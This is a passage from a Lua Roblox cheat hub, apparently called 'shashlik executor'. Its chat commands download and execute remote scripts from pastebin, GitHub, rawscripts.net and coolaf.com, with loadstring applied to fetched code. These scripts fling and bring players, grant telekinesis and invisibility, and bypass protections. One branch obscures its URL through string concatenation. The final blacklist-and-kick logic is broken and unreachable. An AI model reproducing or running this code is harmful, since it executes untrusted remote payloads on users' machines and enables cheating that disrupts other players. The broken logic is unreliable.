elseif spaceSplit[1] == ";inf" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Infinite-Yield-Reborn-Legacy-21819"))()
elseif spaceSplit[1] == ";srp3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Super-ring-parts-without-massage/refs/heads/main/Super%20ring%20parts"))()
elseif spaceSplit[1] == ";rp2" then
loadstring(game:HttpGet("https://pastefy.app/hdd1kF9c/raw"))("T.me/AvtorScripts")
elseif spaceSplit[1] == ";bhtool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Blackhole/refs/heads/main/Blackhole"))()
elseif spaceSplit[1] == ";ngp" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/hm5650/Gravity-inverter/refs/heads/main/GI"))()
elseif spaceSplit[1] == ";na1" then
loadstring(game:HttpGet("https://github.com/Silly-Exploiter/NamedAdmin/raw/refs/heads/main/Script"))()
elseif spaceSplit[1] == ";le" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Lelele-bypasser/refs/heads/main/LeLeBypasser.txt"))()
elseif spaceSplit[1] == ";srp2" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Open-Source-Ring-Parts-26702"))()
elseif spaceSplit[1] == ";bp1" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Bac0nHck/Scripts/main/BringFlingPlayers"))()
elseif spaceSplit[1] == ";bp2" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Better-Bring-Parts-Ui-SOLARA-and-Fixed-Lags-21780"))()
elseif spaceSplit[1] == ";bp3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/GoofyBlox/GoofyZ/refs/heads/main/Best/Vortex.lua"))()
elseif spaceSplit[1] == ";tel1" then
loadstring(game:HttpGet("https://rawscripts.net/raw/a-literal-baseplate.-FE-Telekinesis-15523"))()
elseif spaceSplit[1] == ";tel2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/randomstring0/Qwerty/refs/heads/main/qwerty11.lua"))()
elseif spaceSplit[1] == ";glios" then
writefile(".nonecing", "white")
loadstring(game:HttpGet("http://coolaf.com/run/snippets/gua2ntmbdm/raw/main.lua"))()
elseif spaceSplit[1] == ";punch" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/punch",true))()
elseif spaceSplit[1] == ";akp1" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/ignore-touchinterests/main/main"))()
elseif spaceSplit[1] == ";akp2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Anti-kill-parts-updated-/refs/heads/main/Anti%20kill%20parts%20by%20Zephyr"))()
elseif spaceSplit[1] == ";tel3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sakupenXD/SakupScripts/main/Telekinesis"))()
elseif spaceSplit[1] == ";invis" then
loadstring(game:HttpGet("https://pastebin.com/raw/3Rnd9rHf"))()
elseif spaceSplit[1] == ";cunc" then
loadstring(game:HttpGet("http://coolaf.com/run/snippets/h4d9a8gprw/raw/main.lua"))()
elseif spaceSplit[1] == ";prox" then
for i, v in ipairs(game:GetService("Workspace"):GetDescendants()) do
if v.ClassName == "ProximityPrompt" then
v.HoldDuration = 0
end
end
elseif spaceSplit[1] == ";invis2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/CloudHub111/Scripts/refs/heads/main/Fe%20Invisible%20Beta"))()
elseif spaceSplit[1] == ";rochips" then
if "you wanna use rochips universal" then
local z_x, z_z = "gzrux646yj/raw/main.ts", "http://coolaf.com/run/snippets/"
local im, lonely, z_c = task.wait, game, loadstring
z_c(lonely:HttpGet(z_z .. "" .. z_x))()
return ("This will load in about 2 - 30 seconds" or "according to your device and executor")
end
end
end)
--[[ NOTIFICATION ]]--
local notificationInfo = {
Title = "Welcome!",
Image = "",
Text = "shashlik executor loaded!",
Duration = "Seconds",
Button1 = "Yay"
}
StarterGui:SetCore("SendNotification", notificationInfo)
--[[ INTRO SOUND PLAY ]]--
local loaded = Instance.new("Sound", SoundService)
loaded.SoundId = "rbxassetid://9086208751"
loaded.Volume = 5
loaded:Play()
--[[ PRINT ANY WORDS ]]--
getgenv().printing = {
helloworld = "Shashlik Executor Succesfully Loaded! 🍢 (v.4.0)",
byeworld = "Shashlik Executor Not Loaded! Re-Execute ⛔️ (v.4.0)",
fuckworld = "You Blacklisted On Shashlik Executor 💀 (v.4.0)",
}
if game:IsLoaded() then
print(printing.helloworld)
elseif not game:IsLoaded() then
print(printing.byeworld)
shashlik:Destroy()
elseif speaker.Name == "Roblox" or speaker.Name == "Roblox" then
shashlik:Destroy()
speaker:kick(printing.fuckworld)
end